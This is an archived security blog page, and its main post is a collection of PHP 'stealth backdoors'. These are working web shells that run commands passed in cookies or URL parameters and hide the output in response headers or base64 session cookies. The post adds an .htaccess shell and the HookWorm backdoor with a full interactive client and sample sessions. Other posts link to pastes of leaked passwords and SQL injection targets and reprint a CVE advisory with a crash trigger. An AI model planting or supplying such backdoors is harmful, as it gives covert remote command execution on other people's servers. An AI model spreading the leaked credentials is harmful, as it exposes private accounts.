<div class="post_bottom"></div>
</div>
<div class="clear_content"></div>

<div class="post_meta" id="post-452">
<div class="post_top"></div>
<div class="post_index">
<div class="post_title">
<div class="calendar">
<p class="date">6</p>
<p class="month">Jun</p>
</div>
<div class="post_info">
<h2><a href="http://www.rfdslabs.com.br/?p=452" rel="bookmark" title="PHP Stealth Backdoors">PHP Stealth Backdoors</a></h2>
<span class="author">Posted by <a href="http://www.rfdslabs.com.br/?author=3" title="Posts by rfds" rel="author">rfds</a>&nbsp;</span>
<span class="category">Published in <a href="http://www.rfdslabs.com.br/?cat=3" title="View all posts in Hacking" rel="category">Hacking</a></span></div>
</div>

<div class="post_content">
<p><!-- p.p1 {margin: 0.0px 0.0px 0.0px 0.0px; line-height: 18.0px; font: 12.0px Consolas} --><strong>A PHP stealth backdoors collection.</strong></p>
<p>&nbsp;</p>
<h3>1 -&gt; Using cookie</h3>
<pre class="brush:plain">&lt;?php
@header(’Hidden-Field: '.@exec($_COOKIE['cmd']));
echo "&lt;p&gt;hello&lt;/p&gt;";
?&gt;</pre>
<p><strong>Example:</strong></p>
<h3><span style="font-size: 13px; font-weight: normal;">curl ‘http://target/cookie.php’ -b ‘cmd=id’ -A ‘Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6;fr; rv:1.9.4.5) Gecko/20110606 Firefox/4.4.3′ -e ‘http://www.google.com/’</span></h3>
<p>&nbsp;</p>
<p><strong>2 -&gt; Using HTTP Headers</strong></p>
<pre class="brush:plain">&lt;?php
@header(’Hidden-Field: '.@exec($_COOKIE['cmd']));
echo "&lt;p&gt;hello&lt;/p&gt;";
?&gt;</pre>
<p><strong>Example:</strong></p>
<p>curl -v ‘http://target/headers.php’ -b ‘cmd=id’ -A ‘Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6;fr; rv:1.9.4.5) Gecko/20110606 Firefox/4.4.3′ -e ‘http://www.google.com/’</p>
<p><strong>Output:</strong></p>
<p>HTTP/1.1 200 OK!<br />
Date: Wed, 06 Jun 2011 11:23:18 GMT!<br />
Server: Apache<br />
DAV/2 PHP/5.3.1!X-Powered-By: PHP/5.3.1!<br />
<strong>Hidden-Field: uid=20(nobody) gid=20(nobody) groups=20(nobody)!</strong><br />
Content-Type: text/html</p>
<p><strong>3 -&gt; Base 64 Encode</strong></p>
<pre class="brush:plain">&lt;?php
if(isset($_COOKIE)) @header('Set-Cookie: PHPSESSID='.@base64_encode(@exec($_COOKIE ['cmd'])));
echo "&lt;p&gt;pown&lt;/p&gt;";
?&gt;</pre>
<p><strong>Example:</strong></p>
<p>curl -v ‘http://target/base64.php’ -b ‘cmd=id’ -A ‘Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6;fr; rv:1.9.4.5) Gecko/20110606 Firefox/4.4.3′ -e ‘http://www.google.com/’ -D shellog</p>
<p>$ cat shellog</p>
<p>HTTP/1.1 200 OK!<br />
Date: Wed, 06 Jun 2011 11:23:18 GMT!<br />
Server: Apache<br />
DAV/2 PHP/5.3.1!X-Powered-By: PHP/5.3.1!<br />
Set-Cookie:<br />
PHPSESSID=dWlkPTcwKF93d3cpIGdpZD03MChfd3d3KSBncm91cHM9NzAoX3d3dyksMTAxKG<br />
NvbS5hcHBsZS5zaGFyZXBvaW50Lmdyb3VwLjEpLDYxKGxvY2FsYWNjb3VudHMpLDEyKGV2Z<br />
XJ5b25lKSw0MDIoY29tLmFwcGxlLnNoYXJlcG9pbnQuZ3JvdXAuMyksMTAyKGNvbS5hcHBsZS<br />
5zaGFyZXBvaW50Lmdyb3VwLjIp<br />
Content-Length: 12!<br />
Content-Type: text/html!</p>
<p><strong>Offline Base64 Decode:</strong></p>
<p><strong>uluwatu:~ rfdslabs$</strong> python -c ‘import base64, sys; print base64.decodestring(sys.argv[1]);’ `cat shellog|grep ^Set-Cookie|cut -d ‘=’ -f 2`!</p>
<p><strong>uid=20(nobody) gid=20(nobody) groups=20(nobody)</strong></p>
<p><strong><strong>4 -&gt; With Htaccess<br />
</strong></strong></p>
<pre class="brush:plain"># Self contained .htaccess web shell - Part of the htshell project
# Written by Wireghoul - http://www.justanotherhacker.com
# Override default deny rule to make .htaccess file accessible over web
Order allow,deny
Allow from all
# Make .htaccess file be interpreted as php file. This occur after apache has interpreted
# the apache directoves from the .htaccess file
AddType application/x-httpd-php .htaccess
###### SHELL ###### &lt;?php echo "\n";passthru($_GET['c']." 2&gt;&amp;1"); ?&gt;###### LLEHS ######</pre>
<p>Simply upload the preferred shell as a .htaccess file and then visit the .htaccess file via the url http://domain/path/.htaccess?c=command for remote code execution.</p>
<p>By <a href="http://www.justanotherhacker.com/">Eldar Marcussen</a></p>
<p>More in: <a href="http://www.justanotherhacker.com/projects/htshells/">http://www.justanotherhacker.com/projects/htshells/</a></p>
<p><strong>Update Wed Jun  8 12:04:14 BRT 2011</strong></p>
<p><strong>5 -&gt; The </strong><a href="http://www.madirish.net/?article=489"><strong>HookWorm</strong></a></p>
<p><strong> </strong></p>
<p><strong></p>
<pre class="brush:plain">&lt;?php if(isset($_COOKIE['wormcmd'])) {echo $_COOKIE['delim'] . shell_exec($_COOKIE['wormcmd']) . $_COOKIE['delim'];}?&gt;</pre>
<p></strong></p>
<p><strong> </strong></p>
<p><a href="http://www.madirish.net/?article=489"><strong><span style="color: #000000; font-family: Consolas, Monaco, 'Courier New', Courier, monospace;"><span style="font-size: 12px; line-height: 18px; white-space: pre;"><br />
</span></span> </strong><span style="font-family: Consolas, Monaco, 'Courier New', Courier, monospace; font-size: 12px; line-height: 18px; white-space: pre; color: #000000;"><strong>The Client:</strong></span></a></p>
<pre class="brush:plain">&lt;?php
echo "Enter the IP of the host to connect to:\n";
$host = trim(fgets(STDIN, 256));
echo "Host set to $host\n";
echo "Enter the relative path to the Hookworm (ex: /index.php):\n";
$file = trim(fgets(STDIN, 256));
echo "Enter the delimiter you'd like to use (ex: '***')";
$delim = trim(fgets(STDIN, 256));
if ($delim == '') $delim = "***"; // delimiter
while (1) {
	echo "hookworm&gt; ";
	$command = trim(fgets(STDIN, 256));
	if ($command == 'quit' || $command == 'exit') break;
	$out = "GET $file HTTP/1.1\r\n";
	$out .= "Host: $host\r\n";
	$out .= "Connection: Close\r\n";
	$out .= "Cookie: wormcmd=$command; delim=$delim\r\n";
	$out .= "\r\n";
	if (!$fp=fsockopen($host,80, $errno, $errstr, 15))  return false;
	fwrite($fp, $out);
	$str = ""; 
	//read in a string which is the contents of the required file
	while (!feof($fp)) {
		$str.=fgets($fp, 512);
	}
	fclose($fp);
	$output_start = strpos($str,$delim)+strlen($delim);
	$output_end = strpos($str,$delim,$output_start);
	$output = substr($str, $output_start, $output_end $output_start);
	echo $output;
}
?&gt;</pre>
<p>Once the Hookworm is installed we can quickly connect to it using the command line and issue successive commands in a pseudo shell:</p>
<pre class="brush:plain">$ php hookworm.php
Enter the IP of the host to connect to:
192.168.1.3
Host set to 192.168.1.3
Enter the relative path to the Hookworm (ex: /index.php):
/index.php
Enter the delimiter you'd like to use (ex: '***'):
***
wormcmd&gt; ls
c99.php
drupal-5.23
drupal-5.23.tar.gz
drupal-6.20
drupal-6.20.tar.gz
index.php
osticket_1.6.0
osticket_1.6.0.tar.gz
wormcmd&gt; pwd
/var/www/html
wormcmd&gt; quit
$</pre>
<p>Any more?</p>
<p>References: www.tetri-security.com<br />
www.cgisecurity.com<br />
Eldar Marcussen<br />
www.madirish.net</p>
<p><strong><strong><br />
</strong></strong></p>
<p><strong> </strong></p>
<p><strong> </strong></p>
<p><strong> </strong></p>
<p><strong><br />
</strong></p>
<p>&nbsp;</p>
<div><strong>&nbsp;</p>
<p></strong><strong> </strong></p>
</div>
</div>
<div class="post_comment_counter">
<div class="coms_count"><a href="http://www.rfdslabs.com.br/?p=452#comments">no comment</a></div>
</div>

</div>
<div class="post_bottom"></div>
</div>
<div class="clear_content"></div>

<div class="post_meta" id="post-440">
<div class="post_top"></div>
<div class="post_index">
<div class="post_title">
<div class="calendar">
<p class="date">23</p>
<p class="month">Mar</p>
</div>
<div class="post_info">
<h2><a href="http://www.rfdslabs.com.br/?p=440" rel="bookmark" title="Information Disclosure with Pastebin.com">Information Disclosure with Pastebin.com</a></h2>
<span class="author">Posted by <a href="http://www.rfdslabs.com.br/?author=3" title="Posts by rfds" rel="author">rfds</a>&nbsp;</span>
<span class="category">Published in <a href="http://www.rfdslabs.com.br/?cat=5" title="View all posts in Fun" rel="category">Fun</a>, <a href="http://www.rfdslabs.com.br/?cat=3" title="View all posts in Hacking" rel="category">Hacking</a></span></div>
</div>

<div class="post_content">
<p>The great <a href="http://www.corelan.be">Corelan</a> released a <a href="http://www.corelan.be/index.php/2011/03/22/pastenum-pastebinpastie-enumeration-tool/">tool</a> to gathering information using <a href="http://www.pastebin.com">www.pastebin.com</a></p>
<p>&nbsp;</p>
<p><span style="font-size: 15px; font-weight: bold;">&#8220;Introduction</span></p>
<p>When conducting a pen-test, the process typically starts with the reconnaissance phase, the process of gathering information about your target(s) system, organization or person.</p>
<p>Today, we want to present a tool that can be added to your reconnaissance toolkit.</p>
<p>Text dump sites such as pastebin and pastie.org allow users to dump large amounts of text for sharing and storage&#8230;.&#8221;</p>
<p>So i decide to search in pastebin.com words like: password, login, host:, pass= etc. For my <del>surprise</del> i found a lot of passwords and other things:</p>
<p>Uolbot Password:</p>
<p>http://pastebin.com/kJHs3PUC</p>
<p><a href="http://www.rfdslabs.com.br/wp-content/uploads/2011/03/Picture-184.jpg"><img class="size-medium wp-image-441 alignleft" title="UolBot Pass" src="http://www.rfdslabs.com.br/wp-content/uploads/2011/03/Picture-184-300x204.jpg" alt="" width="300" height="204" /></a></p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>A possible list of SQLinjections:</p>
<p><!-- p.p1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 16.0px Consolas; color: #d6edfd; background-color: #111929} --><a href="http://pastebin.com/sPiEVSeX">http://pastebin.com/sPiEVSeX</a></p>
<p>http://pastebin.com/jXYW0mAc</p>
<p><a href="http://www.rfdslabs.com.br/wp-content/uploads/2011/03/Picture-185.jpg"><img class="alignleft size-medium wp-image-442" title="Sqli" src="http://www.rfdslabs.com.br/wp-content/uploads/2011/03/Picture-185-300x239.jpg" alt="" width="300" height="239" /></a></p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>A tons of users and passwords:</p>
<p><!-- p.p1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 16.0px Consolas; color: #d6edfd; background-color: #111929} --><a href="http://pastebin.com/mST2m26G">http://pastebin.com/mST2m26G</a></p>
<p><a href="http://pastebin.com/mST2m26G">http://pastebin.com/mST2m26G</a></p>
<p><a href="http://pastebin.com/asYUufMq">http://pastebin.com/asYUufMq</a></p>
<p><a href="http://pastebin.com/ppH8HLur">http://pastebin.com/ppH8HLur</a></p>
<p><a href="http://pastebin.com/w81x1fJp">http://pastebin.com/w81x1fJp</a></p>
<p><a href="http://pastebin.com/gVZLayx4">http://pastebin.com/gVZLayx4</a></p>
<p><a href="http://www.rfdslabs.com.br/wp-content/uploads/2011/03/Picture-187.jpg"><img class="alignleft size-medium wp-image-444" title="pass1" src="http://www.rfdslabs.com.br/wp-content/uploads/2011/03/Picture-187-250x300.jpg" alt="" width="250" height="300" /></a></p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&#8230;</p>
<p><a href="http://www.rfdslabs.com.br/wp-content/uploads/2011/03/Picture-188.jpg"><img class="alignnone size-medium wp-image-445" title="Pass2" src="http://www.rfdslabs.com.br/wp-content/uploads/2011/03/Picture-188-266x300.jpg" alt="" width="266" height="300" /></a></p>
<p>&nbsp;</p>
<p>A lame PHPUdp Flooder</p>
<p>http://pastebin.com/mfiAwRzN</p>
<p><a href="http://www.rfdslabs.com.br/wp-content/uploads/2011/03/Picture-186.jpg"><img class="alignleft size-medium wp-image-443" title="UDPFLOOD" src="http://www.rfdslabs.com.br/wp-content/uploads/2011/03/Picture-186-300x199.jpg" alt="" width="300" height="199" /></a></p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>#fail</p>
</div>
<div class="post_comment_counter">
<div class="coms_count"><a href="http://www.rfdslabs.com.br/?p=440#comments">3 comments</a></div>
</div>

</div>
<div class="post_bottom"></div>
</div>
<div class="clear_content"></div>

<div class="post_meta" id="post-431">
<div class="post_top"></div>
<div class="post_index">
<div class="post_title">
<div class="calendar">
<p class="date">30</p>
<p class="month">Jan</p>
</div>
<div class="post_info">
<h2><a href="http://www.rfdslabs.com.br/?p=431" rel="bookmark" title="My First PC CASE!">My First PC CASE!</a></h2>
<span class="author">Posted by <a href="http://www.rfdslabs.com.br/?author=1" title="Posts by rfds" rel="author">rfds</a>&nbsp;</span>
<span class="category">Published in <a href="http://www.rfdslabs.com.br/?cat=5" title="View all posts in Fun" rel="category">Fun</a>, <a href="http://www.rfdslabs.com.br/?cat=14" title="View all posts in Geek" rel="category">Geek</a></span></div>
</div>

<div class="post_content">
<p>OHH YEAH<br />
I found the front of my first computer. A <a href="http://en.wikipedia.org/wiki/Intel_80486DX2">80486DX2</a>. The name MANTEL was the company where my father bought the computer. Amazing!</p>
<p><a href="http://www.rfdslabs.com.br/wp-content/uploads/2011/01/pcase.jpg"><img src="http://www.rfdslabs.com.br/wp-content/uploads/2011/01/pcase-216x300.jpg" alt="" title="pcase" width="216" height="300" class="aligncenter size-medium wp-image-433" /></a></p>
</div>
<div class="post_comment_counter">
<div class="coms_count"><a href="http://www.rfdslabs.com.br/?p=431#comments">1 comment</a></div>
</div>

</div>
<div class="post_bottom"></div>
</div>
<div class="clear_content"></div>

<div class="post_meta" id="post-413">
<div class="post_top"></div>
<div class="post_index">
<div class="post_title">
<div class="calendar">
<p class="date">11</p>
<p class="month">Nov</p>
</div>
<div class="post_info">
<h2><a href="http://www.rfdslabs.com.br/?p=413" rel="bookmark" title="Apple Directory Services Memory Corruption -	CVE-2010-1840">Apple Directory Services Memory Corruption -	CVE-2010-1840</a></h2>
<span class="author">Posted by <a href="http://www.rfdslabs.com.br/?author=1" title="Posts by rfds" rel="author">rfds</a>&nbsp;</span>
<span class="category">Published in <a href="http://www.rfdslabs.com.br/?cat=3" title="View all posts in Hacking" rel="category">Hacking</a>, <a href="http://www.rfdslabs.com.br/?cat=4" title="View all posts in Security" rel="category">Security</a></span></div>
</div>

<div class="post_content">
<p>From: Rodrigo Branco <rbranco () checkpoint com><br />
Date: Thu, 11 Nov 2010 01:12:51 -0800<br />
Dear List,</p>
<p>I&#8217;m writing on behalf of the Check Point Vulnerability Discovery Team to publish the following vulnerability.</p>
<p>Check Point Software Technologies &#8211; Vulnerability Discovery Team (VDT)</p>
<p>http://www.checkpoint.com/defense/</p>
<p>Apple Directory Services Memory Corruption<br />
CVE-2010-1840</p>
<p>INTRODUCTION</p>
<p>chfn, chpass and chsh dos not properly parse authname switch (&#8220;-u&#8221;), which causes the applications to crash when<br />
parsing a long string. Those binaries are setuid root by default.</p>
<p>This problem was confirmed in the following versions of Apple binaries and MacOS, other versions may be also affected: </p>
<p>Apple Mac OS X 10.5.8 32bits /usr/bin/chfn, /usr/bin/chpass, /usr/bin/chsh<br />
Apple Mac OS X 10.6.2 64bits /usr/bin/chfn, /usr/bin/chpass, /usr/bin/chsh</p>
<p>CVSS Scoring System</p>
<p>The CVSS score is: 3.3<br />
        Base Score: 4.2<br />
        Temporal Score: 3.3<br />
We used the following values to calculate the scores:<br />
        Base score is: AV:L/AC:L/Au:R/C:C/I:C/A:C<br />
        Temporal score is: E:POC/RL:OF/RC:C</p>
<p>TRIGGERING THE PROBLEM</p>
<p>/usr/bin/chfn -u `perl -e &#8216;print &#8220;A&#8221; x 3000&#8242;`<br />
/usr/bin/chsh -u `perl -e &#8216;print &#8220;A&#8221; x 3000&#8242;`<br />
/usr/bin/chpass -u `perl -e &#8216;print &#8220;A&#8221; x 3000&#8242;`</p>
<p>DETAILS</p>
<p>Disassembly:</p>
<p>0&#215;92237215 <CFArrayGetValueAtIndex+101>:        mov    $0&#215;28,%al<br />
0&#215;92237217 <CFArrayGetValueAtIndex+103>:        cmp    $0xc,%ecx<br />
0x9223721a <CFArrayGetValueAtIndex+106>:        mov    $0&#215;14,%dl<br />
0x9223721c <CFArrayGetValueAtIndex+108>:        cmovne %edx,%eax<br />
0x9223721f <CFArrayGetValueAtIndex+111>:        add    %esi,%eax<br />
0&#215;92237221 <CFArrayGetValueAtIndex+113>:        mov    0xc(%ebp),%edx<br />
0&#215;92237224 <CFArrayGetValueAtIndex+116>:        lea    (%eax,%edx,4),%eax<br />
0&#215;92237227 <CFArrayGetValueAtIndex+119>:        mov    (%eax),%eax <----- Crash here.</p>
<p>(gdb) x/i $pc<br />
0x92237227 <CFArrayGetValueAtIndex+119>:        mov    (%eax),%eax<br />
(gdb) i r $eax<br />
eax            0x585d910        92657936<br />
(gdb) bt<br />
#0  0&#215;92237227 in CFArrayGetValueAtIndex ()<br />
#1  0x9225c46b in _CFBundleTryOnePreferredLprojNameInDirectory ()<br />
#2  0x9225d80c in _CFBundleAddPreferredLprojNamesInDirectory ()<br />
#3  0x9224b7b0 in _CFBundleGetLanguageSearchList ()<br />
#4  0x9225d8da in _CFBundleAddPreferredLprojNamesInDirectory ()<br />
#5  0x9224b7b0 in _CFBundleGetLanguageSearchList ()<br />
#6  0x9225b50c in CFBundleCopyResourceURL ()<br />
#7  0x9225bb32 in CFBundleCopyLocalizedString ()<br />
#8  0x903633eb in _ODNodeSetCredentials ()<br />
#9  0&#215;90369813 in ODRecordSetNodeCredentials ()<br />
#10 0x000044be in ?? ()<br />
#11 0x000026ac in ?? ()<br />
#12 0x000022ee in ?? ()</p>
<p>The MacOS Heap Protection mechanisms mitigates the impact of this vulnerability.</p>
<p>CREDITS</p>
<p>This vulnerability was researched by Rodrigo Rubira Branco from Check Point Vulnerability Discovery Team (VDT).</p>
<p>ACKNOWLEDGES</p>
<p>Many thanks to <a href="http://www.rfdslabs.com.br">Rafael Silva</a> who brought the issue in chfn binary to our attention.</p>
</div>
<div class="post_comment_counter">
<div class="coms_count"><a href="http://www.rfdslabs.com.br/?p=413#comments">no comment</a></div>
</div>

</div>
<div class="post_bottom"></div>
</div>
<div class="clear_content"></div>

<div class="post_meta" id="post-379">
<div class="post_top"></div>
<div class="post_index">
<div class="post_title">
<div class="calendar">
<p class="date">15</p>
<p class="month">Sep</p>
</div>
<div class="post_info">
<h2><a href="http://www.rfdslabs.com.br/?p=379" rel="bookmark" title="VirusTotal &#8211; Malware MD5 Check Tool">VirusTotal &#8211; Malware MD5 Check Tool</a></h2>
<span class="author">Posted by <a href="http://www.rfdslabs.com.br/?author=1" title="Posts by rfds" rel="author">rfds</a>&nbsp;</span>
<span class="category">Published in <a href="http://www.rfdslabs.com.br/?cat=3" title="View all posts in Hacking" rel="category">Hacking</a>, <a href="http://www.rfdslabs.com.br/?cat=6" title="View all posts in Programming" rel="category">Programming</a>, <a href="http://www.rfdslabs.com.br/?cat=4" title="View all posts in Security" rel="category">Security</a></span></div>
</div>

<div class="post_content">
<p><center><a href="http://www.rfdslabs.com.br/wp-content/uploads/2010/09/malware.jpg"><img src="http://www.rfdslabs.com.br/wp-content/uploads/2010/09/malware-150x150.jpg" alt="" title="malware" width="100" height="100" class="aligncenter size-thumbnail wp-image-384" /></a></center><br />
Cool project from <a href="http://www.mertsarica.com/?p=1432">Mertsarica</a> I&#8217;ts a simple python script for check malware/trojans/virus MD5 hashes on <a href="http://www.virustotal.com/">VirusTotal</a> site or offline.<br />
<a href="http://www.rfdslabs.com.br/wp-content/uploads/2010/09/Picture-120.jpg"><img src="http://www.rfdslabs.com.br/wp-content/uploads/2010/09/Picture-120.jpg" alt="" title="Malware" width="558" height="338" class="aligncenter size-full wp-image-382" /></a></p>
<p>BTW VirusTotal have a nice public API. <a href="http://www.virustotal.com/advanced.html#publicapi">http://www.virustotal.com/advanced.html</a></p>
<p>Download: <a href="http://www.mertsarica.com/codes/malware_check_tool.zip">MalwareCheckTool</a></p>
</div>
<div class="post_comment_counter">
<div class="coms_count"><a href="http://www.rfdslabs.com.br/?p=379#comments">no comment</a></div>
</div>

</div>
<div class="post_bottom"></div>
</div>
<div class="clear_content"></div>


<div class="post_nav"> <div class='wp-pagenavi'>
<span class='pages'>Page 1 of 19</span><span class='current'>1</span><a href='http://www.rfdslabs.com.br/feed/rss/?paged=2' class='page larger'>2</a><a href='http://www.rfdslabs.com.br/feed/rss/?paged=3' class='page larger'>3</a><a href='http://www.rfdslabs.com.br/feed/rss/?paged=4' class='page larger'>4</a><a href='http://www.rfdslabs.com.br/feed/rss/?paged=5' class='page larger'>5</a><span class='extend'>...</span><a href='http://www.rfdslabs.com.br/feed/rss/?paged=10' class='larger page'>10</a><span class='extend'>...</span><a href='http://www.rfdslabs.com.br/feed/rss/?paged=2' class='nextpostslink'>&raquo;</a><a href='http://www.rfdslabs.com.br/feed/rss/?paged=19' class='last'>Last &raquo;</a>
</div></div>


</div>
<div id="sidebars">

<div class="widget_sidebar">

<div class="key_search">
<form method="get" action="/index.php">
<p class="aligncenter"><input name="s" type="text" class="s"  value="Search this blog" onfocus="if(this.value==this.defaultValue)this.value='';" onblur="if(this.value=='')this.value=this.defaultValue;" /><input type="image" class="searchButton" value="Search" src="http://www.rfdslabs.com.br/wp-content/themes/coffee-desk/images/searchButton.jpg" alt="search" /></p>
</form></div>

<div class="div_wrap_sidebar"><div class="top_sidebar"></div><div class="sidebar_content" style="float: none"><h2>rfdslabs</h2>		<ul>
	<li class="cat-item cat-item-15"><a href="http://www.rfdslabs.com.br/?cat=15" title="View all posts filed under Bovespa">Bovespa</a>
</li>
	<li class="cat-item cat-item-9"><a href="http://www.rfdslabs.com.br/?cat=9" title="View all posts filed under Coisas">Coisas</a>
</li>
	<li class="cat-item cat-item-5"><a href="http://www.rfdslabs.com.br/?cat=5" title="View all posts filed under Fun">Fun</a>
</li>
	<li class="cat-item cat-item-14"><a href="http://www.rfdslabs.com.br/?cat=14" title="View all posts filed under Geek">Geek</a>
</li>
	<li class="cat-item cat-item-11"><a href="http://www.rfdslabs.com.br/?cat=11" title="View all posts filed under Google">Google</a>
</li>
	<li class="cat-item cat-item-3"><a href="http://www.rfdslabs.com.br/?cat=3" title="Hacking...">Hacking</a>
</li>
	<li class="cat-item cat-item-10"><a href="http://www.rfdslabs.com.br/?cat=10" title="View all posts filed under Linux">Linux</a>
</li>
	<li class="cat-item cat-item-16"><a href="http://www.rfdslabs.com.br/?cat=16" title="View all posts filed under Mac">Mac</a>
</li>
	<li class="cat-item cat-item-6"><a href="http://www.rfdslabs.com.br/?cat=6" title="View all posts filed under Programming">Programming</a>
</li>
	<li class="cat-item cat-item-4"><a href="http://www.rfdslabs.com.br/?cat=4" title="View all posts filed under Security">Security</a>
</li>
	<li class="cat-item cat-item-7"><a href="http://www.rfdslabs.com.br/?cat=7" title="View all posts filed under Surf">Surf</a>
</li>
	<li class="cat-item cat-item-8"><a href="http://www.rfdslabs.com.br/?cat=8" title="View all posts filed under Textos">Textos</a>
</li>
	<li class="cat-item cat-item-1"><a href="http://www.rfdslabs.com.br/?cat=1" title="View all posts filed under Uncategorized">Uncategorized</a>
</li>
	<li class="cat-item cat-item-12"><a href="http://www.rfdslabs.com.br/?cat=12" title="View all posts filed under Utilidades">Utilidades</a>
</li>
		</ul>
</div><div class="bottom_sidebar"></div></div><div class="div_wrap_sidebar"><div class="top_sidebar"></div><div class="sidebar_content" style="float: none"><h2>Friends</h2>			<div class="textwidget">	<p align="center">
	  <a href="http://http://www.fmarcosalvares.com/">Marcos Alvares</a></p>

	<p align="center">
	  <a href="http://www.tiagoferreira.com.br/">Tiago Ferreira</a></p>	

	<p align="center">
	  <a href="http://www.renatomalta.com.br">Renato Malta</a></p>	


<p align="center">
<a href="http://www.gustavomonteiro.com/">Gustavo Monteiro</a></p>

<p align="center">
<a href="http://www.kernelhacking.com/rodrigo/index.php">Rodrigo BSDaemon</a></p>

<p align="center">
<a href="http://www.tiagoferreira.com.br//">Gustavo Monteiro</a></p>
</div>
		</div><div class="bottom_sidebar"></div></div>		<div class="div_wrap_sidebar"><div class="top_sidebar"></div><div class="sidebar_content" style="float: none">		<h2>Recent Posts</h2>		<ul>
					<li>
				<a href="http://www.rfdslabs.com.br/?p=417" title="Detect Web Scanners">Detect Web Scanners</a>
						</li>
					<li>
				<a href="http://www.rfdslabs.com.br/?p=452" title="PHP Stealth Backdoors">PHP Stealth Backdoors</a>
						</li>
					<li>
				<a href="http://www.rfdslabs.com.br/?p=440" title="Information Disclosure with Pastebin.com">Information Disclosure with Pastebin.com</a>
						</li>
					<li>
				<a href="http://www.rfdslabs.com.br/?p=431" title="My First PC CASE!">My First PC CASE!</a>
						</li>
					<li>
				<a href="http://www.rfdslabs.com.br/?p=413" title="Apple Directory Services Memory Corruption -	CVE-2010-1840">Apple Directory Services Memory Corruption -	CVE-2010-1840</a>
						</li>
				</ul>
		</div><div class="bottom_sidebar"></div></div><div class="div_wrap_sidebar"><div class="top_sidebar"></div><div class="sidebar_content" style="float: none"><h2>Antigamente&#8230;</h2>		<ul>
			<li><a href='http://www.rfdslabs.com.br/?m=201108' title='August 2011'>August 2011</a>&nbsp;(1)</li>
	<li><a href='http://www.rfdslabs.com.br/?m=201106' title='June 2011'>June 2011</a>&nbsp;(1)</li>
	<li><a href='http://www.rfdslabs.com.br/?m=201103' title='March 2011'>March 2011</a>&nbsp;(1)</li>
	<li><a href='http://www.rfdslabs.com.br/?m=201101' title='January 2011'>January 2011</a>&nbsp;(1)</li>
	<li><a href='http://www.rfdslabs.com.br/?m=201011' title='November 2010'>November 2010</a>&nbsp;(1)</li>
	<li><a href='http://www.rfdslabs.com.br/?m=201009' title='September 2010'>September 2010</a>&nbsp;(2)</li>
	<li><a href='http://www.rfdslabs.com.br/?m=201003' title='March 2010'>March 2010</a>&nbsp;(1)</li>
	<li><a href='http://www.rfdslabs.com.br/?m=200906' title='June 2009'>June 2009</a>&nbsp;(1)</li>
	<li><a href='http://www.rfdslabs.com.br/?m=200901' title='January 2009'>January 2009</a>&nbsp;(3)</li>
	<li><a href='http://www.rfdslabs.com.br/?m=200812' title='December 2008'>December 2008</a>&nbsp;(2)</li>
	<li><a href='http://www.rfdslabs.com.br/?m=200810' title='October 2008'>October 2008</a>&nbsp;(4)</li>
	<li><a href='http://www.rfdslabs.com.br/?m=200809' title='September 2008'>September 2008</a>&nbsp;(2)</li>
	<li><a href='http://www.rfdslabs.com.br/?m=200808' title='August 2008'>August 2008</a>&nbsp;(2)</li>
	<li><a href='http://www.rfdslabs.com.br/?m=200807' title='July 2008'>July 2008</a>&nbsp;(4)</li>
	<li><a href='http://www.rfdslabs.com.br/?m=200806' title='June 2008'>June 2008</a>&nbsp;(17)</li>
	<li><a href='http://www.rfdslabs.com.br/?m=200805' title='May 2008'>May 2008</a>&nbsp;(23)</li>
	<li><a href='http://www.rfdslabs.com.br/?m=200804' title='April 2008'>April 2008</a>&nbsp;(2)</li>
	<li><a href='http://www.rfdslabs.com.br/?m=200803' title='March 2008'>March 2008</a>&nbsp;(1)</li>
	<li><a href='http://www.rfdslabs.com.br/?m=200801' title='January 2008'>January 2008</a>&nbsp;(3)</li>
	<li><a href='http://www.rfdslabs.com.br/?m=200712' title='December 2007'>December 2007</a>&nbsp;(3)</li>
	<li><a href='http://www.rfdslabs.com.br/?m=200711' title='November 2007'>November 2007</a>&nbsp;(2)</li>
	<li><a href='http://www.rfdslabs.com.br/?m=200709' title='September 2007'>September 2007</a>&nbsp;(2)</li>
	<li><a href='http://www.rfdslabs.com.br/?m=200708' title='August 2007'>August 2007</a>&nbsp;(1)</li>
	<li><a href='http://www.rfdslabs.com.br/?m=200707' title='July 2007'>July 2007</a>&nbsp;(7)</li>
	<li><a href='http://www.rfdslabs.com.br/?m=200706' title='June 2007'>June 2007</a>&nbsp;(7)</li>
	<li><a href='http://www.rfdslabs.com.br/?m=200705' title='May 2007'>May 2007</a>&nbsp;(1)</li>
	<li><a href='http://www.rfdslabs.com.br/?m=200704' title='April 2007'>April 2007</a>&nbsp;(1)</li>
	<li><a href='http://www.rfdslabs.com.br/?m=200703' title='March 2007'>March 2007</a>&nbsp;(5)</li>
	<li><a href='http://www.rfdslabs.com.br/?m=200702' title='February 2007'>February 2007</a>&nbsp;(4)</li>
	<li><a href='http://www.rfdslabs.com.br/?m=200701' title='January 2007'>January 2007</a>&nbsp;(9)</li>
		</ul>
